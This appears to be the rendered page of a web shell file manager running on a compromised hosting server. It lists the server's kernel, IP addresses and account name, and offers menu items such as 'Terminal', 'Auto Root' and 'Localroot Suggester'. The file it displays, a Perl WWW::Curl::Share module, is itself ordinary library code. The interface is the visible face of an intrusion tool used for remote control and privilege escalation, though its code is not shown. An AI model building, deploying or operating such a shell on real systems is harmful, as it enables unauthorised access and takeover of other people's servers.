Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.217.14
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib64 /
perl5 /
vendor_perl /
WWW /
Curl /
Delete
Unzip
Name
Size
Permission
Date
Action
Easy.pm
14.75
KB
-rw-r--r--
2018-04-17 07:59
Form.pm
627
B
-rw-r--r--
2010-11-28 20:26
Multi.pm
381
B
-rw-r--r--
2010-07-05 00:25
Share.pm
1.02
KB
-rw-r--r--
2018-04-17 07:59
Save
Rename
package WWW::Curl::Share; use strict; use warnings; use Carp; use WWW::Curl (); use Exporter (); our @ISA = qw(Exporter); our @EXPORT = qw( CURLSHOPT_LOCKFUNC CURLSHOPT_NONE CURLSHOPT_SHARE CURLSHOPT_UNLOCKFUNC CURLSHOPT_UNSHARE CURLSHOPT_USERDATA ); sub AUTOLOAD { our $AUTOLOAD; # This AUTOLOAD is used to 'autoload' constants from the constant() # XS function. ( my $constname = $AUTOLOAD ) =~ s/.*:://; my $value = constant( $constname ); if ($!) { croak("Undefined subroutine &$AUTOLOAD failed for reasons of $!, constname was $constname, value was: $value"); } { no strict 'refs'; *{$AUTOLOAD} = sub { $value }; } return $value; } 1; __END__ Copyright (C) 2008, Anton Fedorov (datacompboy <at> mail.ru) You may opt to use, copy, modify, merge, publish, distribute and/or sell copies of the Software, and permit persons to whom the Software is furnished to do so, under the terms of the MPL or the MIT/X-derivate licenses. You may pick one of these licenses.